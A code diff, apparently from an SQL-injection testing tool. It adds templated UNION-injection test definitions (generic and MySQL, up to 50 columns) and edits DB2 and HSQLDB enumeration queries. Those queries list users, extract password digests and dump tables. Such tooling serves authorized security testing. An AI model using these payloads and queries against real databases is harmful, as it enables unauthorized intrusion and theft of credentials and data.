+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+    <test>
+        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+    <!-- End of UNION query tests -->
+</root>
diff --git a/xml/queries.xml b/xml/queries.xml
index 701b57d7e..75185bca0 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -612,8 +612,8 @@
         <!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->        
         <passwords/>
         <privileges>
-            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
-            <blind query="SELECT tabschema||'.'||tabname||CHR(44)||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
+            <inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
+            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
         </privileges>
         <roles/>
         <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
@@ -626,8 +626,8 @@
             <blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
         </tables>
         <columns>
-            <inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
-            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
+            <inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
+            <blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
         </columns>
         <dump_table>
             <inband query="SELECT %s FROM %s"/>
@@ -674,44 +674,44 @@
         <is_dba query="SELECT ADMIN FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE USER=CURRENT_USER"/>
         <check_udf/>
         <users>
-            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
             <!-- LIMIT is needed at start for v1.7 this gets mangled unless no-cast is used -->
             <blind query="SELECT LIMIT %d 1 DISTINCT(user) FROM INFORMATION_SCHEMA.SYSTEM_USERS" count="SELECT COUNT(DISTINCT(user)) FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
+            <inband query="SELECT user FROM INFORMATION_SCHEMA.SYSTEM_USERS"/>
         </users>
         <passwords>
             <!-- Passwords only shown in later versions &gt;=2.0  -->
-            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
             <blind query="SELECT LIMIT %d 1 DISTINCT(password_digest) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'" count="SELECT COUNT(DISTINCT(password_digest)) FROM INFORMATION_SCHEMA.SYSTEM_USERS WHERE user_name='%s'"/>
+            <inband query="SELECT user_name,password_digest FROM INFORMATION_SCHEMA.SYSTEM_USERS" condition="user_name"/>
         </passwords>
         <privileges/>
         <roles/>
         <dbs>
-            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
             <blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS" />
         </dbs>
         <tables>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
             <blind query="SELECT LIMIT %d 1 table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s' " count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE table_schem='%s'"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES" condition="table_schem"/>
         </tables>
         <columns>
-            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
             <blind query="SELECT column_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
+            <inband query="SELECT column_name,type_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE table_name='%s' AND table_schem='%s'" condition="column_name"/>
         </columns>
         <dump_table>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
             <blind query="SELECT LIMIT %d 1 %s FROM %s.%s ORDER BY %s " count="SELECT COUNT(*) FROM %s.%s"/>
+            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
         </dump_table>
         <search_db>
-            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
             <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
+            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS WHERE %s" condition="table_schem"/>
         </search_db>
         <search_table>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
             <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_TABLES WHERE %s" condition="table_name" condition2="table_schem"/>
         </search_table>
         <search_column>
-            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
             <blind query="SELECT DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s"  count="SELECT COUNT(DISTINCT(table_schem)) FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
+            <inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
         </search_column>
     </dbms>
 </root>